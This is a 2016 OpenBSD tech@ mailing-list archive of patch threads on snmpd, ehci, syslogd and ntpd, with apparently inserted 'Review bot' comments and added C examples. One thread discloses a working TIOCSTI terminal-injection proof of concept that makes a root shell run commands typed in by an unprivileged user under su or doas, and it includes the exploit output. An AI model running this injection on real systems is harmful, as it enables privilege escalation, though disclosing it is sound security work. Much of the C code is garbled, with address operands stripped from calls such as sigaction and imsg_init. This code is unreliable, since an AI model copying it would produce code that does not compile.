EVP_CipherFinal_ex for snmpd

2016-10-01 Thread David Gwynne
this gets rid of a linker warning.

the impression i get is that EVP_CipherFinal_ex explicitly does
not do cleanup of the cipher context thing, while EVP_CipherFinal
could if it wanted to.

ok?

Index: usm.c
===
RCS file: /cvs/src/usr.sbin/snmpd/usm.c,v
retrieving revision 1.9
diff -u -p -r1.9 usm.c
--- usm.c   16 Jan 2015 00:05:13 -  1.9
+++ usm.c   2 Oct 2016 05:32:03 -
@@ -605,7 +605,7 @@ usm_crypt(struct snmp_message *msg, u_ch
EVP_CIPHER_CTX_set_padding(, 0);
 
if (EVP_CipherUpdate(, outbuf, , inbuf, inlen) &&
-   EVP_CipherFinal(, outbuf + len, ))
+   EVP_CipherFinal_ex(, outbuf + len, ))
rv = len + len2;
else
rv = -1;
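Review bot: EVP_CipherFinal_ex() leaves the cipher context alone, so after the changed call in usm_crypt() the context still holds the key schedule on both the rv = len + len2 and the rv = -1 paths. The hunk does not show a cleanup call; please confirm EVP_CIPHER_CTX_cleanup() runs before the function returns on either path, and say so in the commit message alongside the linker warning.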



Re: ehci(4)/imxehci(4) diff to switch port into host mode

2016-10-01 Thread Jonathan Gray
On Sat, Oct 01, 2016 at 03:48:35PM +0200, Mark Kettenis wrote:
> The USB controller on the Freescale i.MX application processors has a
> dual role port that can act as device (OTG) or as host.  Since we
> don't have any device mode support in our kernel, we try to switch the
> port into host mode.  Unfortunately that never worked.  Here's why:
> 
> The USBMODE register that controls the mode, gets reset whenever we
> reset the controller, i.e. when ehci_reset() gets called.  Since
> ehci_init() calls ehci_reset() we lose the host mode setting almost
> immediately, and nothing works.
> 
> The diff below adds code to save and restore the USBMODE register if
> the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4)
> driver.  I also moved the defines for this register to ehcireg.h.
> While this isn't a standard EHCI register, it seems that it is present
> on many dual-role USB 2.0 controllers.  Allegedly it is part of a
> design that ended up being licensed to many other companies.
> 
> Note that the register offset changed from 0xa8 to 0x68.  This is not
> a bug.  I made the offset relative to the offset given by the
> EHCI_CAPLENGTH register.  It is now accessed using EOREAD4/EOWRITE4
> instead of EREAD4/EWRITE4.
> 
> ok?

The top usb port on the cubox now works with this.  ok jsg@

> 
> 
> Index: arch/armv7/imx/imxehci.c
> ===
> RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v
> retrieving revision 1.17
> diff -u -p -r1.17 imxehci.c
> --- arch/armv7/imx/imxehci.c  13 Aug 2016 11:08:58 -  1.17
> +++ arch/armv7/imx/imxehci.c  1 Oct 2016 13:26:02 -
> @@ -58,9 +58,6 @@
>  /* ehci */
>  #define USB_EHCI_OFFSET  0x100
>  
> -#define EHCI_USBMODE 0xa8
> -
> -#define EHCI_USBMODE_HOST(3 << 0)
>  #define EHCI_PS_PTS_UTMI_MASK((1 << 25) | (3 << 30))
>  
>  /* usb non-core */
> @@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st
>   sc->sc.iot = faa->fa_iot;
>   sc->sc.sc_bus.dmatag = faa->fa_dmat;
>   sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET;
> + sc->sc.sc_flags = EHCIF_USBMODE;
>  
>   /* Map I/O space */
>   if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr,
> @@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st
>   USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3);
>  
>   /* set host mode */
> - EWRITE4(>sc, EHCI_USBMODE,
> - EREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_HOST);
> + EOWRITE4(>sc, EHCI_USBMODE,
> + EOREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST);
>  
>   /* set to UTMI mode */
>   EOWRITE4(>sc, EHCI_PORTSC(1),
> Index: dev/usb/ehci.c
> ===
> RCS file: /cvs/src/sys/dev/usb/ehci.c,v
> retrieving revision 1.193
> diff -u -p -r1.193 ehci.c
> --- dev/usb/ehci.c15 Sep 2016 02:00:17 -  1.193
> +++ dev/usb/ehci.c1 Oct 2016 13:26:02 -
> @@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a
>  usbd_status
>  ehci_reset(struct ehci_softc *sc)
>  {
> - u_int32_t hcr;
> + u_int32_t hcr, usbmode;
>   int i;
>  
>   EOWRITE4(sc, EHCI_USBCMD, 0);   /* Halt controller */
> @@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc)
>   if (!hcr)
>   printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname);
>  
> + if (sc->sc_flags & EHCIF_USBMODE)
> + usbmode = EOREAD4(sc, EHCI_USBMODE);
> +
>   EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET);
>   for (i = 0; i < 100; i++) {
>   usb_delay_ms(>sc_bus, 1);
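Review bot: usbmode is assigned only under if (sc->sc_flags & EHCIF_USBMODE) in this hunk and read under a second, separate test of the same flag after the reset loop, so some compilers will warn that it may be used uninitialized. Initializing it at the declaration (u_int32_t hcr, usbmode = 0;) keeps the build quiet and keeps the restore well defined if the two conditions ever diverge.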
> @@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc)
>   printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname);
>   return (USBD_IOERROR);
>   }
> +
> + if (sc->sc_flags & EHCIF_USBMODE)
> + EOWRITE4(sc, EHCI_USBMODE, usbmode);
>  
>   return (USBD_NORMAL_COMPLETION);
>  }
> Index: dev/usb/ehcireg.h
> ===
> RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v
> retrieving revision 1.20
> diff -u -p -r1.20 ehcireg.h
> --- dev/usb/ehcireg.h 10 Apr 2015 13:56:42 -  1.20
> +++ dev/usb/ehcireg.h 1 Oct 2016 13:26:02 -
> @@ -162,6 +162,13 @@
>  
>  #define EHCI_PORT_RESET_COMPLETE 2 /* ms */
>  
> +/* Nonstandard register to set controller mode. */
> +#define EHCI_USBMODE 0x68
> +#define  EHCI_USBMODE_CM_M   0x0003
> +#define  EHCI_USBMODE_CM_IDLE0x
> +#define  EHCI_USBMODE_CM_DEVICE  0x0002
> +#define  EHCI_USBMODE_CM_HOST0x0003  
> +
>  #define EHCI_FLALIGN_ALIGN   0x1000
>  
>  /* No data structure may cross a page boundary. */
> Index: dev/usb/ehcivar.h
> ===
> RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v
> retrieving revision 1.36
> diff -u -p -r1.36 ehcivar.h
> --- dev/usb/ehcivar.h 2 Nov 2015 

Re: Explicitly cast the return variable in tls_load_file()

2016-10-01 Thread Ted Unangst
Kinichiro Inoguchi wrote:
> I would like to cast the return variable explicitly in tls_load_file().
> This fix also avoids the Intel C++ compiler "assertion failed" described here.
> https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024

This is a compiler bug? The code doesn't change, and there's no bug in the
library that I see.



share/misc: Complete 'airport' and 'inter.phone' for Poland

2016-10-01 Thread Frederic Cambus
Hi tech@,

This diff adds missing airports and area codes for Poland, and fixes
some erroneous entries.

OK?

Index: share/misc/airport
===
RCS file: /cvs/src/share/misc/airport,v
retrieving revision 1.56
diff -u -p -r1.56 airport
--- share/misc/airport  10 Jul 2016 13:52:27 -  1.56
+++ share/misc/airport  1 Oct 2016 20:37:42 -
@@ -273,6 +273,7 @@ BXU:Butuan, Butuan, Philippines
 BYO:Bonito, Brazil
 BYU:Bindlacher Berg, Bayreuth, Germany
 BZE:Philip S. W. Goldson International, Belize City, Belize
+BZG:Szwederowo, Bydgoszcz, Poland
 BZN:Gallatin Field, Bozeman, Montana, USA
 CAE:Columbia Metropolitan, South Carolina, USA
 CAG:Elmas, Cagliari, Sardinia, Italy
@@ -726,6 +727,7 @@ IAS:Iasi, Romania
 IBZ:Ibiza, Spain
 ICT:Wichita Mid-Continent, Kansas, USA
 IDA:Idaho Falls, Idaho, USA
+IEG:Babimost, Zielona Gora, Poland
 IEV:Kyiv Zhulyany International, Kyiv, Ukraine
 IFO:Ivano-Frankivs'k International, Ivano-Frankivs'k, Ukraine
 IFP:Bullhead City, Arizona, USA
@@ -936,6 +938,7 @@ LCA:Larnaca International, Cyprus
 LCE:La Ceiba International, Honduras
 LCG:La Coruna, Spain
 LCH:Lake Charles, Louisiana, USA
+LCJ:Lublinek, Lodz, Poland
 LCY:London City, England, United Kingdom
 LDB:Londrina, Parana, Brazil
 LDE:Tarbes International, Lourdes/Tarbes, France
@@ -1009,6 +1012,7 @@ LUD:Luderitz, Namibia
 LUG:Agno, Lugano, Switzerland
 LUN:Lusaka, Zambia
 LUX:Findel, Luxembourg
+LUZ:Swidnik, Lublin, Poland
 LVI:Livingstone, Zambia
 LVK:Livermore, California, USA
 LWB:Greenbrier Valley, West Virginia, USA
@@ -1345,7 +1349,7 @@ POP:La Union, Puerto Plata, Dominican Re
 POR:Pori, Finland
 POS:Port Of Spain, Trinidad
 POU:Dutchess County, Poughkeepsie, New York, USA
-POZ:Lawica, Poznan, Poland
+POZ:Poznan, Poland
 PPG:Pago Pago International, American Samoa
 PPS:Puerto Princesa, Philippines
 PPT:Pape'ete, Tahiti, French Polynesia
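Review bot: the POZ line drops the airport name (Lawica) while every entry added elsewhere in this diff uses the Name, City, Poland form (for example BZG:Szwederowo, Bydgoszcz, Poland). If Lawica is wrong, replace it with the correct name rather than removing the field, or say in the commit message why POZ is the exception.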
@@ -1406,6 +1410,7 @@ RCB:Richards Bay, South Africa
 RCE:Roche Harbor, Washington, USA
 RDD:Redding, California, USA
 RDG:Reading Municipal / Spaatz Field, Pennsylvania, USA
+RDO:Sadkow, Radom, Poland
 RDU:Raleigh-Durham, North Carolina, USA
 REC:Guararapes International, Recife, Pernambuco, Brazil
 REG:Tito Menniti, Reggio Calabria, Italy
@@ -1457,6 +1462,7 @@ RUN:Roland Garros Airport, Reunion Islan
 RUT:Rutland, Vermont, USA
 RWI:Wilson, Rocky Mount, North Carolina, USA
 RWN:Rivne International, Rivne, Ukraine
+RZE:Jasionka, Rzeszow, Poland
 SAB:Saba Island, Netherlands Antilles
 SAF:Santa Fe, New Mexico, USA
 SAH:Sanaa International, Yemen
@@ -1620,6 +1626,7 @@ SZG:Salzburg, Austria
 SZR:Stara Zagora, Bulgaria
 SZS:Ryan's Creek, Stewart Island, New Zealand
 SZX:Shenzhen, China
+SZY:Szymany, Olsztyn, Poland
 SZZ:Goleniow, Szczecin, Poland
 TAB:Crown Point, Tobago, Trinidad And Tobago
 TAC:Dz Romualdez, Tacloban, Philippines
@@ -1815,6 +1822,7 @@ WIL:Wilson, Nairobi, Kenya
 WIN:Winton, Queensland, Australia
 WLG:Wellington International, New Zealand
 WMH:Mountain Home, Arkansas, USA
+WMI:Modlin, Warsaw, Poland
 WNA:Napakiak, Alaska, USA
 WRL:Worland, Wyoming, USA
 WRO:Strachowice, Wroclaw, Poland
Index: share/misc/inter.phone
===
RCS file: /cvs/src/share/misc/inter.phone,v
retrieving revision 1.42
diff -u -p -r1.42 inter.phone
--- share/misc/inter.phone  9 Jul 2016 23:32:51 -   1.42
+++ share/misc/inter.phone  1 Oct 2016 20:37:42 -
@@ -1711,10 +1711,55 @@
 47:2:Oslo:Norway
 47:5:Bergen:Norway
 47:7:Trondheim:Norway
-48:12:Crakow:Poland
+48:12:Krakow:Poland
+48:13:Krosno:Poland
+48:14:Tarnow:Poland
+48:15:Tarnobrzeg:Poland
+48:16:Przemysl:Poland
+48:17:Rzeszow:Poland
+48:18:Nowy Sacz:Poland
 48:22:Warsaw:Poland
+48:23:Ciechanow:Poland
+48:24:Plock:Poland
+48:25:Siedlce:Poland
+48:29:Ostroleka:Poland
+48:32:Katowice:Poland
+48:33:Bielsko-Biala:Poland
+48:34:Czestochowa:Poland
+48:41:Kielce:Poland
 48:42:Lodz:Poland
+48:43:Sieradz:Poland
+48:44:Piotrkow Trybunalski:Poland
+48:46:Skierniewice:Poland
+48:48:Radom:Poland
+48:52:Bydgoszcz:Poland
+48:54:Wloclawek:Poland
+48:55:Elblag:Poland
+48:56:Torun:Poland
 48:58:Gdansk:Poland
+48:59:Slupsk:Poland
+48:61:Poznan:Poland
+48:62:Kalisz:Poland
+48:63:Konin:Poland
+48:65:Leszno:Poland
+48:67:Pila:Poland
+48:68:Zielona Gora:Poland
+48:71:Wroclaw:Poland
+48:74:Walbrzych:Poland
+48:75:Jelenia Gora:Poland
+48:76:Legnica:Poland
+48:77:Opole:Poland
+48:81:Lublin:Poland
+48:82:Chelm:Poland
+48:83:Biala Podlaska:Poland
+48:84:Zamosc:Poland
+48:85:Bialystok:Poland
+48:86:Lomza:Poland
+48:87:Suwalki:Poland
+48:89:Olsztyn:Poland
+48:91:Szczecin:Poland
+48:94:Koszalin:Poland
+48:95:Gorzow Wielkopolski:Poland
 49:201:Essen:Germany
 49:202:Wuppertal:Germany
 49:203:Duisburg:Germany



Re: Unexpected behavior in su/doas

2016-10-01 Thread Theo de Raadt
> I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
> which seems to allow running commands as the original user when
> using su and doas interactively because the controlling terminal
> is the same.

Use of su, doas, or sudo -- means you EXPLICITLY want the tty to
remain the same.

> The following binary is used to test this and compiled as
> /tmp/a.out:
> 
> #include <sys/ioctl.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <unistd.h>
> 
> char s[] = "echo Payload as $(whoami)\n";
> 
> void main(void) {
>     printf("uid: %d\n", getuid());
> 
>     char *c = s;
>     int i = 0;
>     int tty = open("/dev/tty", 0);
> 
>     do {
>         ioctl(tty, TIOCSTI, c);
>         c++;
>     } while (*c);
> 
>     return;
> }
> 
> Now running su builder -c /tmp/a.out (where builder is just a
> normal user with a shell) results in:
> 
> # su builder -c /tmp/a.out
> uid: 1000
> echo Payload as $(whoami)
> # echo Payload as $(whoami)
> Payload as root
> 
> Similar happens with doas and the following config:
> 
> # cat /etc/doas.conf
> permit nopass root as builder
> 
> # doas -u builder /tmp/a.out
> uid: 1000
> echo Payload as $(whoami)
> # echo Payload as $(whoami)
> Payload as root
> 
> Is this behavior expected and if so, how do I run commands from
> root as an untrusted user? It's not mentioned in the man page
> that using su/doas as root might allow other users to run code as
> root.

It sounds as if you don't understand what happens.

The command gets run afterwards.

> Similar behavior is also mentioned in an old (and unfixed) Debian
> bug [1].

So what is learned here?

De-escalation using these "sudo" or "doas" like tools on a tty is
somewhat unsafe - it has always been unsafe - because tty's have
capabilities.

If you wish to be safer, do these operations without retaining access
to a tty.

Escalation on the other hand (user -> root) is different, because then
it is clear you want to do more / everything.  But de-escalation is a
joke.

This is just one mechanism on tty, there are others.  On other
descriptors there are other abilities.

I don't have an answer.
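
One way to act on the advice above about not retaining tty access, as an added example (not code from this thread or from OpenBSD): a C helper that starts the command in a new session, replaces all three stdio descriptors, and only then drops to the target uid/gid. The name run_detached and the /bin/sh probe are made up for this illustration.

```c
#define _DEFAULT_SOURCE		/* glibc: expose setgroups() */
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Run argv[0] in a new session with stdio moved off the caller's terminal
 * and descriptors 3..1023 closed.  If drop is non-zero the child switches
 * to uid/gid first (caller must be root).  The child's stdout/stderr are
 * relayed through a pipe into out.  Returns the exit status, -1 on error.
 */
int
run_detached(char *const argv[], int drop, uid_t uid, gid_t gid,
    char *out, size_t outlen)
{
	char scratch[256];
	int p[2], fd, status;
	size_t used = 0;
	ssize_t i, n;
	pid_t pid;

	if (outlen == 0 || pipe(p) == -1)
		return -1;
	if ((pid = fork()) == -1) {
		close(p[0]);
		close(p[1]);
		return -1;
	}
	if (pid == 0) {
		/* New session: the child has no controlling terminal. */
		if (setsid() == -1)
			_exit(126);
		/* Inherited stdio still points at the tty; replace all three. */
		if ((fd = open("/dev/null", O_RDONLY)) == -1 ||
		    dup2(fd, STDIN_FILENO) == -1 ||
		    dup2(p[1], STDOUT_FILENO) == -1 ||
		    dup2(p[1], STDERR_FILENO) == -1)
			_exit(126);
		for (fd = 3; fd < 1024; fd++)
			close(fd);
		/* Drop groups, then gid, then uid; any failure is fatal. */
		if (drop && (setgroups(1, &gid) == -1 ||
		    setgid(gid) == -1 || setuid(uid) == -1))
			_exit(126);
		execv(argv[0], argv);
		_exit(127);
	}
	close(p[1]);
	for (;;) {
		n = read(p[0], scratch, sizeof(scratch));
		if (n == -1 && errno == EINTR)
			continue;
		if (n <= 0)
			break;
		/* Keep what fits; keep draining so the child never blocks. */
		for (i = 0; i < n && used + 1 < outlen; i++)
			out[used++] = scratch[i];
	}
	out[used] = '\0';
	close(p[0]);
	while (waitpid(pid, &status, 0) == -1)
		if (errno != EINTR)
			return -1;
	return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed probe: report whether the command can still open /dev/tty. */
int
main(void)
{
	char *probe[] = { "/bin/sh", "-c",
	    "if (: </dev/tty) 2>/dev/null; then echo tty; else echo notty; fi",
	    NULL };
	char out[64];
	int rc = run_detached(probe, 0, 0, 0, out, sizeof(out));

	printf("exit=%d output=%s", rc, out);
	return rc == 0 ? 0 : 1;
}
```

The caller only ever sees the child's output as bytes from the pipe, so nothing the child does can land in the caller's terminal input queue.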



Unexpected behavior in su/doas

2016-10-01 Thread Simon Ruderich
Hello,

I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
which seems to allow running commands as the original user when
using su and doas interactively because the controlling terminal
is the same.

The following binary is used to test this and compiled as
/tmp/a.out:

#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

char s[] = "echo Payload as $(whoami)\n";

void main(void) {
    printf("uid: %d\n", getuid());

    char *c = s;
    int i = 0;
    int tty = open("/dev/tty", 0);

    do {
        ioctl(tty, TIOCSTI, c);
        c++;
    } while (*c);

    return;
}

Now running su builder -c /tmp/a.out (where builder is just a
normal user with a shell) results in:

# su builder -c /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Similar happens with doas and the following config:

# cat /etc/doas.conf
permit nopass root as builder

# doas -u builder /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Is this behavior expected and if so, how do I run commands from
root as an untrusted user? It's not mentioned in the man page
that using su/doas as root might allow other users to run code as
root.

Similar behavior is also mentioned in an old (and unfixed) Debian
bug [1].

Regards
Simon

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628843
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9




Re: syslogd fork+exec

2016-10-01 Thread Rafael Zalamena
On Thu, Sep 29, 2016 at 08:09:23PM +0200, Alexander Bluhm wrote:
> Hi,
> 
> With this diff syslogd(8) does an exec on itself in the privileged
> parent process to reshuffle its memory layout.
> 
> As syslogd only forks once, it does not really matter whether we
> fork+exec in the child or in the parent.  To do it in the parent
> is easier as it has much less state.
> 
> ok?
> 
> bluhm

Your diff looks good and you made me realize that I should use dup3()
instead of dup2() to create children socket.

Short explanation for outsiders: dup2(fd1, fd2) duplicates fd1 onto fd2
removing CLOEXEC flags, except if fd1 == fd2, then in that case the fd
will remain with CLOEXEC and things will not work. This is not the case
with httpd(8), relayd(8), ntpd(8) and switchd(8), but since code might
be copied around it would be good to fix this there.

I'm using this diff and it works in my default configuration, but since
I'm not familiar with syslogd I don't feel comfortable giving oks here.

I made one comment inline in the snipped diff below.

> 
> Index: usr.sbin/syslogd/privsep.c
> ===
> RCS file: /data/mirror/openbsd/cvs/src/usr.sbin/syslogd/privsep.c,v
> retrieving revision 1.61
> diff -u -p -r1.61 privsep.c
> --- usr.sbin/syslogd/privsep.c28 Jun 2016 18:22:50 -  1.61
> +++ usr.sbin/syslogd/privsep.c29 Sep 2016 17:55:03 -
> @@ -194,38 +162,87 @@ priv_init(char *conf, int numeric, int l
>   if (fd_unix[i] != -1)
>   close(fd_unix[i]);
>  
> - /* Save the config file specified by the child process */
> - if (strlcpy(config_file, conf, sizeof config_file) >= 
> sizeof(config_file))
> - errx(1, "config_file truncation");
> + if (dup3(socks[0], 3, 0) == -1)
> + err(1, "dup3 priv sock failed");
> + snprintf(childnum, sizeof(childnum), "%d", child_pid);
> + if ((privargv = reallocarray(NULL, argc + 3, sizeof(char *))) == NULL)
> + err(1, "alloc priv argv failed");
> + for (i = 0; i < argc; i++)
> + privargv[i] = argv[i];
> + privargv[i++] = "-P";
> + privargv[i++] = childnum;
> + privargv[i++] = NULL;
> + execv(privargv[0], privargv);
> + err(1, "exec priv '%s' failed", privargv[0]);
> +}
>  
> - if (stat(config_file, _info) < 0)
> - err(1, "stat config file failed");
> +__dead void
> +priv_exec(char *conf, int numeric, int child, int argc, char *argv[])
> +{
> + int i, fd, sock, cmd, addr_len, result, restart;
> + size_t path_len, protoname_len, hostname_len, servname_len;
> + char path[PATH_MAX], protoname[5];
> + char hostname[NI_MAXHOST], servname[NI_MAXSERV];
> + struct sockaddr_storage addr;
> + struct stat cf_info, cf_stat;
> + struct addrinfo hints, *res0;
> + struct sigaction sa;
>  
> - /* Save whether or not the child can have access to getnameinfo(3) */
> - if (numeric > 0)
> - allow_getnameinfo = 0;
> - else
> - allow_getnameinfo = 1;
> + if (pledge("stdio rpath wpath cpath dns getpw sendfd id proc exec",
> + NULL) == -1)
> + err(1, "pledge priv");
> +
> + if (argc <= 2 || strcmp("-P", argv[argc - 2]) != 0)
> + errx(1, "exec without priv");
> + argv[argc -= 2] = NULL;
> +
> + sock = 3;
> + for (fd = 4; fd < 1024; fd++)
> + close(fd);
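Review bot: dup3(socks[0], 3, 0) at the top of this hunk returns -1 with EINVAL when socks[0] is already 3, so the err(1, "dup3 priv sock failed") path would fire in that case; either make sure socks[0] can never be 3 or handle socks[0] == 3 by clearing FD_CLOEXEC instead. Separately, execv(privargv[0], privargv) does no PATH search, so it relies on argv[0] being a usable path to the syslogd binary; that deserves a check or at least a comment.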

This could be replaced with "closefrom(4);".

> +
> + child_pid = child;
> +
> + memset(, 0, sizeof(sa));
> + sigemptyset(_mask);
> + sa.sa_flags = SA_RESTART;
> + sa.sa_handler = SIG_DFL;
> + for (i = 1; i < _NSIG; i++)
> + sigaction(i, , NULL);
> +
> + /* Pass TERM/HUP/INT/QUIT through to child, and accept CHLD */
> + sa.sa_handler = sig_pass_to_chld;
> + sigaction(SIGTERM, , NULL);
> + sigaction(SIGHUP, , NULL);
> + sigaction(SIGINT, , NULL);
> + sigaction(SIGQUIT, , NULL);
> + sa.sa_handler = sig_got_chld;
> + sa.sa_flags |= SA_NOCLDSTOP;
> + sigaction(SIGCHLD, , NULL);
> +
> + setproctitle("[priv]");
> +
> + if (stat(conf, _info) < 0)
> + err(1, "stat config file failed");
>  
>   TAILQ_INIT();
>   increase_state(STATE_CONFIG);
>   restart = 0;
>  
>   while (cur_state < STATE_QUIT) {
> - if (may_read(socks[0], , sizeof(int)))
> + if (may_read(sock, , sizeof(int)))
>   break;
>   switch (cmd) {
>   case PRIV_OPEN_TTY:
>   logdebug("[priv]: msg PRIV_OPEN_TTY received\n");
>   /* Expecting: length, path */
> - must_read(socks[0], _len, sizeof(size_t));
> + must_read(sock, _len, sizeof(size_t));
>   if (path_len == 0 || path_len > sizeof(path))
>   _exit(1);
> - must_read(socks[0], , path_len);
> +   
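
The dup2() corner case explained in the reply above, as an added example (not part of the original mail or of any OpenBSD daemon): it shows that dup2(fd, fd) silently keeps close-on-exec, that dup3(fd, fd, 0) fails with an error instead, and one way to cover both cases. The helper name pin_fd_for_exec is hypothetical and the pipe is constructed sample input.

```c
#define _GNU_SOURCE		/* glibc: expose dup3() */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* 1 if fd is marked close-on-exec, 0 if it is not, -1 on error. */
int
is_cloexec(int fd)
{
	int flags = fcntl(fd, F_GETFD);

	return flags == -1 ? -1 : (flags & FD_CLOEXEC) != 0;
}

/* Constructed sample input: a pipe read end with FD_CLOEXEC set. */
static int
cloexec_fd(void)
{
	int p[2];

	if (pipe(p) == -1)
		return -1;
	close(p[1]);
	if (fcntl(p[0], F_SETFD, FD_CLOEXEC) == -1) {
		close(p[0]);
		return -1;
	}
	return p[0];
}

/* dup2(fd, fd) succeeds as a no-op, so the flag silently survives. */
int
dup2_same_keeps_cloexec(void)
{
	int fd = cloexec_fd(), r;

	if (fd == -1)
		return -1;
	r = (dup2(fd, fd) == fd) ? is_cloexec(fd) : -1;
	close(fd);
	return r;
}

/* dup3(fd, fd, 0) refuses the same case; return the errno it reports. */
int
dup3_same_errno(void)
{
	int fd = cloexec_fd(), e;

	if (fd == -1)
		return -1;
	errno = 0;
	e = (dup3(fd, fd, 0) == -1) ? errno : 0;
	close(fd);
	return e;
}

/* Hypothetical helper: make fd available as `target` across exec. */
int
pin_fd_for_exec(int fd, int target)
{
	int flags;

	if (fd == target) {
		/* Already in place: only the flag has to change. */
		if ((flags = fcntl(fd, F_GETFD)) == -1)
			return -1;
		return fcntl(fd, F_SETFD, flags & ~FD_CLOEXEC) == -1 ?
		    -1 : target;
	}
	if (dup3(fd, target, 0) == -1)
		return -1;
	close(fd);
	return target;
}

int
main(void)
{
	int fd = cloexec_fd();

	printf("dup2 same fd, cloexec kept: %d\n", dup2_same_keeps_cloexec());
	printf("dup3 same fd, EINVAL: %d\n", dup3_same_errno() == EINVAL);
	if (fd == -1 || pin_fd_for_exec(fd, fd) != fd)
		return 1;
	printf("pinned fd, cloexec now: %d\n", is_cloexec(fd));
	return 0;
}
```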

ntpd(8): use stack instead of heap

2016-10-01 Thread Rafael Zalamena
The ntpd(8) constraint fork+exec diff changed the way the constraint
processes are created, but then it introduced new calloc()s to avoid
increasing diff size and to focus on the problem. Now that the fork+exec
is in, this diff makes those variables become part of the stack.

No functional changes, just changing variables storage location.

ok?


Index: constraint.c
===
RCS file: /home/obsdcvs/src/usr.sbin/ntpd/constraint.c,v
retrieving revision 1.32
diff -u -p -r1.32 constraint.c
--- constraint.c26 Sep 2016 17:17:01 -  1.32
+++ constraint.c1 Oct 2016 18:54:35 -
@@ -317,8 +317,8 @@ priv_constraint_readquery(struct constra
 void
 priv_constraint_child(const char *pw_dir, uid_t pw_uid, gid_t pw_gid)
 {
-   struct constraint   *cstr;
-   struct ntp_addr_msg *am;
+   struct constraintcstr;
+   struct ntp_addr_msg  am;
uint8_t *data;
static char  addr[NI_MAXHOST];
struct timeval   rectv, xmttv;
@@ -332,10 +332,6 @@ priv_constraint_child(const char *pw_dir
if (setpriority(PRIO_PROCESS, 0, 0) == -1)
log_warn("could not set priority");
 
-   if ((cstr = calloc(1, sizeof(*cstr))) == NULL ||
-   (am = calloc(1, sizeof(*am))) == NULL)
-   fatal("%s: calloc", __func__);
-
/* Init TLS and load CA certs before chroot() */
if (tls_init() == -1)
fatalx("tls_init");
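Review bot: the removed calloc() calls zeroed *cstr and *am, while the stack variables that replace them in the first hunk are declared without an initializer and no memset() is visible. Later hunks set cstr.addr_head.name and cstr.addr_head.path only when am.namelen and am.pathlen are non-zero and then pass both to httpsdate_query(), so zero both structs before first use (memset(&cstr, 0, sizeof(cstr)); and the same for am).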
@@ -364,9 +360,9 @@ priv_constraint_child(const char *pw_dir
if (pledge("stdio inet", NULL) == -1)
fatal("pledge");
 
-   cstr->fd = CONSTRAINT_PASSFD;
-   imsg_init(>ibuf, cstr->fd);
-   priv_constraint_readquery(cstr, am, );
+   cstr.fd = CONSTRAINT_PASSFD;
+   imsg_init(, cstr.fd);
+   priv_constraint_readquery(, , );
 
/*
 * Get the IP address as name and set the process title accordingly.
@@ -374,8 +370,8 @@ priv_constraint_child(const char *pw_dir
 * any DNS operation, so it is safe to be called without the dns
 * pledge.
 */
-   if (getnameinfo((struct sockaddr *)>addr->ss,
-   SA_LEN((struct sockaddr *)>addr->ss),
+   if (getnameinfo((struct sockaddr *)>ss,
+   SA_LEN((struct sockaddr *)>ss),
addr, sizeof(addr), NULL, 0,
NI_NUMERICHOST) != 0)
fatalx("%s getnameinfo", __func__);
@@ -394,21 +390,21 @@ priv_constraint_child(const char *pw_dir
fatal("%s fcntl F_SETFD", __func__);
 
/* Get remaining data from imsg in the unpriv child */
-   if (am->namelen) {
-   if ((cstr->addr_head.name =
-   get_string(data, am->namelen)) == NULL)
+   if (am.namelen) {
+   if ((cstr.addr_head.name =
+   get_string(data, am.namelen)) == NULL)
fatalx("invalid IMSG_CONSTRAINT_QUERY name");
-   data += am->namelen;
+   data += am.namelen;
}
-   if (am->pathlen) {
-   if ((cstr->addr_head.path =
-   get_string(data, am->pathlen)) == NULL)
+   if (am.pathlen) {
+   if ((cstr.addr_head.path =
+   get_string(data, am.pathlen)) == NULL)
fatalx("invalid IMSG_CONSTRAINT_QUERY path");
}
 
/* Run! */
if ((ctx = httpsdate_query(addr,
-   CONSTRAINT_PORT, cstr->addr_head.name, cstr->addr_head.path,
+   CONSTRAINT_PORT, cstr.addr_head.name, cstr.addr_head.path,
conf->ca, conf->ca_len, , )) == NULL) {
/* Abort with failure but without warning */
exit(1);
@@ -418,9 +414,9 @@ priv_constraint_child(const char *pw_dir
iov[0].iov_len = sizeof(rectv);
iov[1].iov_base = 
iov[1].iov_len = sizeof(xmttv);
-   imsg_composev(>ibuf,
+   imsg_composev(,
IMSG_CONSTRAINT_RESULT, 0, 0, -1, iov, 2);
-   imsg_flush(>ibuf);
+   imsg_flush();
 
/* Tear down the TLS connection after sending the result */
httpsdate_free(ctx);



stricter sys_mount() flag handling

2016-10-01 Thread Martin Natano
After committing the new MNT_NOPERM flag I got some complaints that my
code doesn't work by people that recompiled mount_ffs, but didn't reboot
to the new kernel. I don't blame them; in that situation sys_mount()
silently ignores the unknown flag. IMHO we should check the flags more
strictly. Ok?

natano


